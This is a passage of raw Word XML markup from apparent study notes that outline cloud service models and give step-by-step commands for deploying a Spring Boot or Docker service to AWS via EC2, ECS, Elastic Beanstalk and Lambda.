        <w:t xml:space="preserve"> categorized mainly into three broad service models, and each comes with its own set of functionalities. Here's a detailed explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB28590" w14:textId="77777777" w:rsidR="00D530AD" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00C632D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85B5A63">
          <v:rect id="_x0000_i3438" style="width:0;height:1.5pt" o:hralign="right" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BAADEB"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1. Infrastructure as a Service (IaaS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAEEA96"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 xml:space="preserve">Provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>virtualized hardware resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> over the internet such as servers, storage, and networking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646A4AA4"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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBE60B9"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Hosting websites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E918FAC"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Creating virtual machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014173A2"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Setting up development and test environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FDBF87"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Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA9884C"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mazon EC2 (AWS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DE79E9"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Google Compute Engine (GCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F7E996"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Virtual Machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC908C5" w14:textId="77777777" w:rsidR="00D530AD" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00C632D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3A76B18">
          <v:rect id="_x0000_i3439" style="width:0;height:1.5pt" o:hralign="right" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6228FC"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2. Platform as a Service (PaaS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CB26F7"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 xml:space="preserve">Offers a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>platform with tools and services</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to develop, test, and deploy applications without managing underlying infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A275EC"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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6192AE4F"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Building scalable web apps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5335F9CB"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Developing mobile backends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BCCC91"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API development</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E00BF20"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Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB11068"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Google App Engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCF4131"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App Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6604E5B7"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Heroku</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ED937E" w14:textId="77777777" w:rsidR="00D530AD" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00C632D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8C468EF">
          <v:rect id="_x0000_i3440" style="width:0;height:1.5pt" o:hralign="right" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="094025D7"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3. Software as a Service (SaaS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF84D25"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 xml:space="preserve">Delivers </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fully functional software</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> applications over the internet, managed by the provider.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB46C71"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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B10964"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Email services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C1E8BD"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CRM systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140A8955"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File sharing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7343404B"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Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760662D9"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Gmail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0B045B"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Salesforce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B31C0F"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lastRenderedPageBreak/>
        <w:t>Microsoft Office 365</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D482ECF" w14:textId="77777777" w:rsidR="00D530AD" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00C632D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1FA8459">
          <v:rect id="_x0000_i3441" style="width:0;height:1.5pt" o:hralign="right" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0538A05B"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4. Function as a Service (FaaS) / Serverless:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686C7EED"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 xml:space="preserve">Executes </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>individual functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or pieces of code in response to events. No need to manage servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254E28F5"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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42861732"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Event-driven processing (e.g., image uploads, API calls)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D34AAFD"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Microservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58906CDF"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Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AD935C"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WS Lambda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FAFCED"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Functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC5D507"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Google Cloud Functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138A71F2" w14:textId="77777777" w:rsidR="00D530AD" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00C632D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2B416FC">
          <v:rect id="_x0000_i3442" style="width:0;height:1.5pt" o:hralign="right" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="414202E4"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5. Storage Services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C75C497"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 xml:space="preserve">Provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scalable and durable storage</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> solutions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D038D93"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Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5B2D80"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mazon S3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ED4CF6"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Google Cloud Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAE3B73"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Blob Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092BB2ED" w14:textId="77777777" w:rsidR="00D530AD" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00C632D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1E2946A">
          <v:rect id="_x0000_i3443" style="width:0;height:1.5pt" o:hralign="right" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7BE338"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6. Database Services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C8D33A"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 xml:space="preserve">Cloud-based </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>managed database</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> offerings (SQL/NoSQL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5C49E4"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Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558B5FEE"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mazon RDS / DynamoDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEC1ED3"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SQL Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23677E0A"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Google Cloud Firestore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545B0300" w14:textId="77777777" w:rsidR="00D530AD" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00C632D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C64A2AB">
          <v:rect id="_x0000_i3444" style="width:0;height:1.5pt" o:hralign="right" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="428EE7C6"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7. Networking Services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5E696C"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 xml:space="preserve">Includes services like </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>virtual networks, load balancers, VPNs</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CDNs</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FF53E9"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Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5542FF43"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WS VPC, ELB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0647A395"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Virtual Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055B305F"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Cloudflare (CDN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165B6A8E" w14:textId="77777777" w:rsidR="00D530AD" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00C632D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BC12CD9">
          <v:rect id="_x0000_i3445" style="width:0;height:1.5pt" o:hralign="right" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C138C59"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8. DevOps &amp; Monitoring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FC061B"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 xml:space="preserve">Provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CI/CD pipelines, code repositories, logging, and monitoring tools</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7382F021"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Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01431648"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WS CodePipeline / CloudWatch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BA780A"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DevOps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9BCDBB"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Google Cloud Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AA368D" w14:textId="0C9E0887" w:rsidR="00D61854" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D6185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1BCA1F6">
          <v:rect id="_x0000_i3446" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6900F6BF" w14:textId="02A53D3B" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="00372A8C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="851" w:name="_Toc196308331"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to deploy service to AWS</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="851"/>
    </w:p>
    <w:p w14:paraId="71687F1A" w14:textId="3BF3B719" w:rsidR="00D530AD" w:rsidRPr="00C632D7" w:rsidRDefault="00D530AD" w:rsidP="00C632D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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 xml:space="preserve">To deploy a service to </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can use several options depending on your architecture (e.g., web app, microservice, containerized app). Below is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>step-by-step guide</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the most commonly used methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E10760" w14:textId="77777777" w:rsidR="00D530AD" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00C632D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DF11B91">
          <v:rect id="_x0000_i3447" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E4BC53"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1. Deploying a Java Spring Boot App to AWS EC2 (Traditional VM deployment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59199CCF"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Prerequisites:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A1972D"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AWS account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40317B5B"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EC2 instance (Linux/Ubuntu)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45561C03"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SSH key pair</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137D83A6"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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513021A3"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Package the App:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E875C1B"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gradlew build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E5553E"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or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0418C5"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mvn clean package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3710F7"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lastRenderedPageBreak/>
        <w:t>Connect to EC2 via SSH:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41928D93"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ssh -i "your-key.pem" ec2-user@your-ec2-public-ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4E22EF"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Install Java if not present:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069EFF33"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sudo yum install java-17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB0E8DF"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Upload the JAR file using SCP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E28655"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scp -i "your-key.pem" target/app.jar ec2-user@your-ec2-ip:/home/ec2-user/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1248441F"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Run the app:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796A198C"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java -jar app.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76630A37" w14:textId="77777777" w:rsidR="00D530AD" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00C632D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5BB428D">
          <v:rect id="_x0000_i3448" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="508BD1A5"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2. Deploying Dockerized Service to AWS ECS (Elastic Container Service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF695EA"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Prerequisites:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E1E5DB"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Docker installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193BF713"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AWS CLI configured</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8258C3"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ECR repository created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9407E9"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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D002BAC"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Build Docker Image:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A981789"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docker build -t my-service .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CBC980"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Tag and Push to AWS ECR:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFDE819"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aws ecr get-login-password | docker login --username AWS --password-stdin &lt;aws_account_id&gt;.dkr.ecr.&lt;region&gt;.amazonaws.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABDF48D"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docker tag my-service &lt;aws_account_id&gt;.dkr.ecr.&lt;region&gt;.amazonaws.com/my-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745BAD98"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docker push &lt;aws_account_id&gt;.dkr.ecr.&lt;region&gt;.amazonaws.com/my-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1FA164"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Create ECS Cluster and Service (Fargate or EC2 launch type)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AWS Console</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AWS CLI</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to set up task definitions and deploy the container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647F7F39" w14:textId="77777777" w:rsidR="00D530AD" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00C632D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BF4C987">
          <v:rect id="_x0000_i3449" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A409E54"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3. Deploying via AWS Elastic Beanstalk (PaaS for apps)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C06B037"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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A3148E"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Install EB CLI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26587F0D"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pip install awsebcli</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0EEC0B"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Initialize Beanstalk project:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53821F10"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eb init -p java-17 spring-boot-app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EE8413"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Create environment and deploy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764DAFE1"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eb create spring-env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6148EC"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eb deploy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383734B7" w14:textId="77777777" w:rsidR="00D530AD" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00C632D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8E423A0">
          <v:rect id="_x0000_i3450" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EE260D"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4. Deploying via AWS Lambda (For serverless apps)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233684D6"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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D92BD7C"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Microservices/functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017C43A6"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Lightweight APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173BE5B0" w14:textId="77777777" w:rsidR="00D530AD" w:rsidRPr="00C632D7" w:rsidRDefault="00D530AD"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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE7551F"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Write handler function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B976D8"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Package and upload ZIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E10FFFB"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Create Lambda function from Console or CLI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D390CEA" w14:textId="77777777" w:rsidR="00D530AD" w:rsidRPr="00C632D7" w:rsidRDefault="00D530AD"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Trigger via API Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D399DD" w14:textId="7EDABF32" w:rsidR="00D61854" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D6185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325DEA2">
          <v:rect id="_x0000_i3451" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DE19AB" w14:textId="7F1986AA" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="003002AA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="852" w:name="_Toc196308332"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
